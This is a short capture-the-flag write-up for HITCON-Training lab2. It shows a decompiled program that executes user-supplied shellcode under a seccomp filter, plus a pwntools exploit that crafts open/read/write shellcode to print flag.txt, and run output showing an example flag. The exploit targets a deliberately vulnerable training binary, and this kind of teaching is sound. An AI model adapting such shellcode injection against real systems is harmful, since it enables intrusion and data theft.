[HITCON-Training] lab2

HITCON-Training lab2

Summary

• 32bit

• shellcode

Analysis

main

int __cdecl main(int argc, const char **argv, const char **envp)
{
  orw_seccomp();
  printf("Give my your shellcode:");
  read(0, &shellcode, 0xC8u);
  ((void (*)(void))shellcode)();
  return 0;
}

seccomp때문에 일반적인 쉘코드는 작동하지 않는다. 직접 flag.txt를 읽어서 출력하는 쉘코드를 만들면 된다.

Exploit

from pwn import *
​
e = ELF("./orw.bin")
p = process("./orw.bin")
​
context(arch="i386", os="linux")
​
payload = ""
payload += shellcraft.open("flag.txt")
payload += shellcraft.read("eax", "esp", 100)
payload += shellcraft.write(1, "esp", 100)
​
p.recvuntil(":")
p.send(asm(payload))
p.interactive()

cg10036@cg10036-virtual-machine:~/HITCON-Training/LAB/lab2$ p ex.py 
[*] '/home/cg10036/HITCON-Training/LAB/lab2/orw.bin'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[+] Starting local process './orw.bin': pid 3563
[*] Switching to interactive mode
FLAG{THIS_IS_EXAMPLE_FLAG}
\x0076ڷ\x00Ѳ𑳷\x0076ڷ\x00\x00\x00Չ\xb8\xff݉\xb8\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00Ѳ񃭷򡸷\x00\x00Ѳ𑳷\x00$   [*] Got EOF while reading in interactive
$ 
[*] Interrupted
[*] Process './orw.bin' stopped with exit code -11 (SIGSEGV) (pid 3563)